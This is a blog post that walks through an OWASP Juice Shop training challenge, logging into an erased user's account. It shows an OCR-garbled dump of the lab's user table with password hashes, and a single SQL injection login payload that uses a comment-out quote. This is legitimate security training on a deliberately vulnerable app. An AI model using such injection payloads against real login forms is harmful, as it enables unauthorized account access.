Information Security

Hacking OWASP’s Juice Shop Pt. 33: GDPR Data Erasure

Posted on by codeblue04

Challenge: 

Name: GDPR Data Exposure

Description: Log in with Chris’ erased user account

Difficulty: 3 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

None.

Resources used:

None.

Methodology: 

Owing in no small part to the Login Bender challenge solution, after reading the expanded description I was fairly certain that, provided I could find Chris’ account in the user database, I could solve this challenge in the same way, using SQL injection.

Table: Users [19 entries] I id | 1 | 255 | role 9 15 1 11 4 12 13 14 5 17 19 18 8 7 6 16 10 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 admin customer customer admin deluxe admin customer customer admin admin customer admin deluxe customer accounting customer customer customer customer ema il J12934öjuice-sh . op accountantajuice-sh.op adminajuice-sh . op amyojuice-sh . op benderajuice-sh . op bjoern . kimminichagmail . com bjoernajuice-sh . op bjoernaowasp.org chris . pikeö)juice-sh . op cisoajuice-sh. op demo emmaajuice-sh . op jinnjuice-sh . op johnajuice-sh . op mc . safesearchajuice-sh . op mortyajuice-sh . op supportajuice-sh . op uvoginöjuice-sh . op wurstbrotajuice-sh . op isActive I 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 password 01920230bbd73250516f069df18b5øø e541ca7ecf72b8d1286474fc613e5e45 øc36e517e3fa95aabf1bbffc6744a4ef 6edd9d726cbdc873c53ge41ae8757b8c 861917d5fa5f1172f931dc7øød81a8fb d57386e761071øøa7d6c2782978b2e7b f2f933d0bb0baø57bc8e33b8ebd6d9e8 b03f4b0ba8b458faøacdcø2cdb953bc8 3c2abc04ua6ea8f1327doaae3714b7d gad5b0492bbe528583e128d2a8941de4 030f05e45e3071øc3ad3c32f00deø473 7f311911af16fa8f418dd1a3051d6810 9283 fib2e9669749081963beø462e466 10083b9ed19ea1c67c3ü7699f0095b 963e10f92ü0b4b46322øcb4c5d636dc 05f92148b4b60f7dacd04cceebb8f1af feø1ce2a7fbac8fafaed7c982aø4e229 00479e957b6b42c459ee5746478e4d45 402f1c4a75e316afec%6ea63147f739

Chris’ information, fortunately, was still located in the user database, so I implemented my plan.

Login Email chris.pike@juice-sh.op'-- Password Forgot your password? Log in Remember me G Log in with Google Not yet a customer?
You successfully solved a challenge: GDPR Data Erasure (Log in with Chris' erased user account.) x

Prevention and Mitigation Strategies:

OWASP User Privacy Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

Nothing, really. I’d already learned this trick completing Login Bender.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s